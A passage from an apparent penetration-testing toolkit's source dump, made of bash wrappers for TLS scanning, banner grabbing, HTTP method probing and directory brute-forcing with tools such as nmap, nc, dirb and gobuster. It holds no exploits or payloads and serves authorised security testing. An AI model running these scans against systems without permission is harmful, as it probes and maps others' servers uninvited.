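    # One sanitised tag is shared by both file names: '/' is replaced so
    # neither argument can move the reports out of the current directory.
    tag="${1//\//_}_${2//\//_}"
    sslscan --show-certificate --verbose --no-colour --xml="sslscan_${tag}.xml" "$1:$2" 2>&1 | tee "${tag}_sslscan.txt"
else
    echo "Please provide the target ip address and the port."  >&2
    exit 1
fi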
29 |
--------------------------------------------------------------------------------
/ssl/tlssled.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2025 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
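# Run tlssled against host $1 on port $2.
if [ $# -eq 2 ]; then
    # Quoted so each value is passed to tlssled as exactly one argument.
    tlssled "$1" "$2"
else
    echo "Please provide the host and the port." >&2
    exit 1
fi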
29 |
--------------------------------------------------------------------------------
/web/banner-grabbing-curl-http-proxy.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2020 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 |
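# Fetch the response headers of the target in $2 through the proxy in $1.
# Both arguments are required: the command uses "$1" for -x and "$2" as the
# URL, so a check for a single argument would call curl with an empty URL.
if [ $# -eq 2 ]; then
    # --insecure skips certificate verification, so the returned headers are
    # not authenticated; treat them as an observation, not as proof of origin.
    curl -I -i -X HEAD -x "$1" --insecure "$2"
else
    echo "Please provide a proxy server and a target host." >&2
    exit 1
fi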
30 |
--------------------------------------------------------------------------------
/web/banner-grabbing-curl-http.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2020 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 |
# Print the response headers of the target given as the only argument; any
# other argument count prints the usage hint instead.
case $# in
    1)
        # --insecure: certificate verification is skipped, so headers are
        # returned even when the certificate is self-signed or expired.
        curl -s -I -i -X HEAD --insecure "$1"
        ;;
    *)
        echo "Please provide a target host."
        ;;
esac
30 |
--------------------------------------------------------------------------------
/web/banner-grabbing-nc-http.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2020 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 |
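# Send a minimal HTTP/1.0 HEAD request over a raw TCP connection and print
# whatever the server answers.
#   $1  target host
#   $2  target port
# Host and port are quoted so that whitespace or glob characters in an
# argument cannot be split into extra nc arguments. printf emits exactly the
# request line plus the terminating blank line.
if [ "$#" -eq 2 ]; then
    printf 'HEAD / HTTP/1.0\r\n\r\n' | nc "$1" "$2"
else
    echo "Please provide the target host and port."
fi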
30 |
--------------------------------------------------------------------------------
/web/banner-grabbing-nc.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2020 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 |
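# Open a verbose TCP connection to the target so that any banner the service
# sends on connect is shown.
#   $1  target host
#   $2  target port
# Both values are quoted so an argument containing whitespace or glob
# characters is passed to nc as a single word.
if [ "$#" -eq 2 ]; then
    nc -v "$1" "$2"
else
    echo "Please provide a target host and a port."
fi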
30 |
--------------------------------------------------------------------------------
/web/banner-grabbing-nmap-built-in.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2020 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 |
# Run nmap service/version detection at intensity 5 against the given ports.
#   $1  target host
#   $2  port list, passed to -p
if [ $# -ne 2 ]; then
    echo "Please provide a target host and a list of ports."
else
    target="$1"
    ports="$2"
    nmap -sV --version-intensity 5 "$target" -p"$ports"
fi
30 |
--------------------------------------------------------------------------------
/web/banner-grabbing-nmap-script.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2020 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 |
# Run nmap version detection together with the "banner" script against the
# given ports.
#   $1  target host
#   $2  port list, passed to -p
if [ $# -ne 2 ]; then
    echo "Please provide a target host and a list of ports."
else
    target="$1"
    ports="$2"
    nmap -sV --script=banner "$target" -p"$ports"
fi
30 |
--------------------------------------------------------------------------------
/web/banner-grabbing-wget-http.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2020 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 |
# Request the target URL ($1) with curl.
# NOTE(review): the file is named after wget but the command is curl. In curl,
# -q only has an effect when it is the first argument, and -S only changes
# output when combined with -s, so as written this is a plain GET that prints
# the response body rather than the headers. Confirm the intended tool and
# flags.
if [ $# -ne 1 ]; then
    echo "Please provide a target host."
else
    curl "$1" -q -S
fi
30 |
--------------------------------------------------------------------------------
/web/curl-delete.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2018 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 |
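# Send an HTTP DELETE request through a proxy and print the response with
# its headers.
#   $1  Accept header, as a full "Name: value" line
#   $2  authentication Cookie header, as a full "Name: value" line
#   $3  proxy (e.g. http://127.0.0.1:8080)
#   $4  target url
# The cookie is passed on the command line, so it is visible in the process
# list and in shell history on the machine running the script.
# --insecure disables TLS certificate verification for the connection.
if [ "$#" -eq 4 ]; then
    curl -X DELETE --header "$1" --header 'Accept-Language: en' --header "$2" -x "$3" --insecure --include "$4"
else
    # The usage text lists exactly the four arguments the script reads; the
    # previous text also asked for a content type and post data that are
    # never used.
    echo "Please provide Accept header, authorization cookie, proxy server and target url."
fi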
35 |
--------------------------------------------------------------------------------
/web/curl-get.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2018 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 |
# Send an HTTP GET request through a proxy and print the response with its
# headers.
#   $1  Accept header, as a full "Name: value" line
#   $2  authentication Cookie header, as a full "Name: value" line
#   $3  proxy (e.g. http://127.0.0.1:8080)
#   $4  target url
# --insecure disables TLS certificate verification for the connection.
if [ $# -ne 4 ]; then
    echo "Please provide Accept header, authorization cookie, proxy server and target url."
else
    curl --request GET \
        --header "$1" \
        --header 'Accept-Language: en' \
        --header "$2" \
        --proxy "$3" \
        --insecure \
        --include \
        "$4"
fi
35 |
--------------------------------------------------------------------------------
/web/curl-options-proxy.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2018 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 |
# Send an HTTP OPTIONS request through a proxy and print the response
# headers, which is where a server lists the methods it allows.
#   $1  proxy (e.g. http://127.0.0.1:8080)
#   $2  target url
# --insecure disables TLS certificate verification for the connection.
if [ $# -ne 2 ]; then
    echo "Please provide proxy server and target url."
else
    curl --include --head --request OPTIONS --proxy "$1" --insecure "$2"
fi
33 |
--------------------------------------------------------------------------------
/web/curl-options.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2018 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 |
# Send an HTTP OPTIONS request directly to the target and print the response
# headers.
#   $1  target url
# --insecure disables TLS certificate verification for the connection.
if [ $# -ne 1 ]; then
    echo "Please provide a target host."
else
    curl --include --head --request OPTIONS --insecure "$1"
fi
32 |
--------------------------------------------------------------------------------
/web/curl-robots.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2020 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 |
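# Fetch /robots.txt from the target, print it with the response headers and
# keep a copy in the current directory.
#   $1  protocol scheme (http or https)
#   $2  target server
#   $3  port
# curl flags: -s silent, -S still show errors, -i include headers, -k skip
# TLS certificate verification; -m 10 caps the transfer at ten seconds.
# The URL is quoted so the three arguments always form one curl argument.
# NOTE(review): $2 is also used in the output file name, so a value that
# contains "/" makes tee write outside the current directory or fail.
if [ "$#" -eq 3 ]; then
    curl -sSik "$1://$2:$3/robots.txt" -m 10 2>&1 | tee "$1_$2_$3_robots.txt"
else
    echo "Please provide the protocol scheme (http or https), the target server (IP address, hostname or URI) and the port."
fi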
30 |
--------------------------------------------------------------------------------
/web/curl-trace.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2018 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
# Send an HTTP TRACE request directly to the target and print the response
# headers, to see whether the server answers the TRACE method.
#   $1  target url
# This script takes a single argument and uses no proxy.
# --insecure disables TLS certificate verification for the connection.
if [ $# -ne 1 ]; then
    echo "Please provide a target host."
else
    curl --include --head --request TRACE --insecure "$1"
fi
31 |
--------------------------------------------------------------------------------
/web/dir-scanner-dirsearch-big.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2020 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 |
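# Run dirsearch against the target URL ($1) with the SecLists "big" wordlist
# and write a plain-text report to the current directory.
# The report name is derived from the URL: runs of "/" and "." become "_"
# and ":" is removed.
# A private variable holds the report name instead of LOGNAME, which is the
# conventional login-name environment variable; when it is already exported,
# reassigning it changes what dirsearch and every other child process sees.
# The URL and the report path are quoted so characters such as spaces, "&"
# or "*" in the URL are not reinterpreted by the shell.
if [ "$#" -eq 1 ]; then
    report=$(printf '%s\n' "dirsearch_$1" | sed -r -e 's/[/]+/_/g' -e 's/[.]+/_/g' -e 's/[:]+//g')
    report="$report.txt"
    dirsearch -b -u "$1" -t 16 -r -E -f -w /usr/share/seclists/Discovery/Web-Content/big.txt --plain-text-report="$report"
else
    echo "Please provide the target URL."
fi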
33 |
--------------------------------------------------------------------------------
/web/dir-scanner-dirsearch-medium.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2020 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 |
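# Run dirsearch against the target URL ($1) with the DirBuster medium
# wordlist and write a plain-text report to the current directory.
# The report name is derived from the URL: runs of "/" and "." become "_"
# and ":" is removed.
# A private variable holds the report name instead of LOGNAME, which is the
# conventional login-name environment variable; when it is already exported,
# reassigning it changes what dirsearch and every other child process sees.
# The URL and the report path are quoted so characters such as spaces, "&"
# or "*" in the URL are not reinterpreted by the shell.
if [ "$#" -eq 1 ]; then
    report=$(printf '%s\n' "dirsearch_$1" | sed -r -e 's/[/]+/_/g' -e 's/[.]+/_/g' -e 's/[:]+//g')
    report="$report.txt"
    dirsearch -b -u "$1" -t 16 -r -E -f -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --plain-text-report="$report"
else
    echo "Please provide the URL."
fi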
33 |
--------------------------------------------------------------------------------
/web/dir-scanner-fine-tuned.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2018 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 |
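# Run dirb against the target with the SecLists "big" wordlist, a custom
# user agent and one HTTP status code to ignore; results go to a text file
# in the current directory.
#   $1  target url
#   $2  user agent string (dirb -a)
#   $3  HTTP code to ignore (dirb -N)
# The user agent is quoted because real user agent strings contain spaces;
# unquoted, only the first word reached -a and the rest became stray dirb
# arguments.
# A private variable holds the report name instead of LOGNAME, the
# conventional login-name environment variable, so child processes keep the
# real value.
if [ "$#" -eq 3 ]; then
    report=$(printf '%s\n' "dirb_big_results_$1" | sed -r -e 's/[/]+/_/g' -e 's/[.]+/_/g' -e 's/[:]+//g')
    report="$report.txt"
    dirb "$1" /usr/share/seclists/Discovery/Web-Content/big.txt -a "$2" -l -r -S -o "$report" -f -N "$3"
else
    echo "Please provide the target url, a user agent string and an HTTP code to ignore."
fi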
33 |
--------------------------------------------------------------------------------
/web/dir-scanner-gobuster.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2024 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 |
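# Run gobuster in directory mode against the target with the SecLists "big"
# wordlist and a custom user agent; results go to a text file in the current
# directory.
#   $1  target URL
#   $2  user agent string (gobuster -a)
# -k skips TLS certificate verification, so results from an https target are
# read without authenticating the server.
# The user agent is quoted because real user agent strings contain spaces.
# A private variable holds the report name instead of LOGNAME, the
# conventional login-name environment variable, so child processes keep the
# real value.
if [ "$#" -eq 2 ]; then
    report=$(printf '%s\n' "gobuster_$1" | sed -r -e 's/[/]+/_/g' -e 's/[.]+/_/g' -e 's/[:]+//g')
    report="$report.txt"
    gobuster dir -u "$1" -w /usr/share/seclists/Discovery/Web-Content/big.txt -a "$2" -e -k -o "$report"
else
    # The script requires two arguments, so the usage text names both.
    echo "Please provide the target URL and a user agent string."
fi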
33 |
--------------------------------------------------------------------------------
/web/dir-scanner-proxy.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2018 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 |
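# Run dirb against the target through a proxy with the SecLists "big"
# wordlist and a custom user agent; results go to a text file in the current
# directory.
#   $1  target url base
#   $2  user agent string (dirb -a)
#   $3  proxy host
#   $4  proxy port
# Four arguments are required: the command reads $4 for the proxy port, and
# the earlier check for three arguments always produced "-p host:" with an
# empty port.
# A private variable holds the report name instead of LOGNAME, the
# conventional login-name environment variable, so child processes keep the
# real value.
if [ "$#" -eq 4 ]; then
    report=$(printf '%s\n' "dirb_big_results_$1" | sed -r -e 's/[/]+/_/g' -e 's/[.]+/_/g' -e 's/[:]+//g')
    report="$report.txt"
    dirb "$1" /usr/share/seclists/Discovery/Web-Content/big.txt -a "$2" -l -r -S -o "$report" -p "$3:$4"
else
    echo "Please provide the target url base, the user agent string and the proxy host and port."
fi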
33 |
--------------------------------------------------------------------------------
/web/dir-scanner.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2020 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 |
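# Run dirb against the target URL ($1) with the SecLists "big" wordlist and
# write the results to a text file in the current directory.
# The report name is derived from the URL: runs of "/" and "." become "_"
# and ":" is removed.
# A private variable holds the report name instead of LOGNAME, the
# conventional login-name environment variable, so child processes keep the
# real value. The URL and the report path are quoted so the shell passes
# each as a single word.
if [ "$#" -eq 1 ]; then
    report=$(printf '%s\n' "dirb_big_results_$1" | sed -r -e 's/[/]+/_/g' -e 's/[.]+/_/g' -e 's/[:]+//g')
    report="$report.txt"
    dirb "$1" /usr/share/seclists/Discovery/Web-Content/big.txt -l -r -S -o "$report"
else
    echo "Please provide the target url."
fi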
33 |
--------------------------------------------------------------------------------
/web/eyewitness.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2023 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 |
25 |
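# Capture screenshots of a list of web URLs with EyeWitness.
#   $1  line-separated file containing the URLs to capture
#   $2  directory name for the report output
#   $3  User-Agent string sent with every request
# The third argument is now passed to --user-agent. Previously the script
# demanded it but always sent a hard-coded browser string, so the value the
# operator supplied was silently ignored.
if [ "$#" -eq 3 ]; then
    eyewitness --web -f "$1" --threads 10 --max-retries 2 -d "$2" --user-agent "$3" --no-prompt
else
    echo "Please provide a Line seperated file containing URLs to capture, a Directory name for report output and a User-Agent string."
fi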
31 |
--------------------------------------------------------------------------------
/web/html-to-png-screenshot.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2020 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 |
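# Render the root page of the target with wkhtmltoimage and save it as a PNG
# in the current directory.
#   $1  protocol scheme (http or https)
#   $2  target server
#   $3  port
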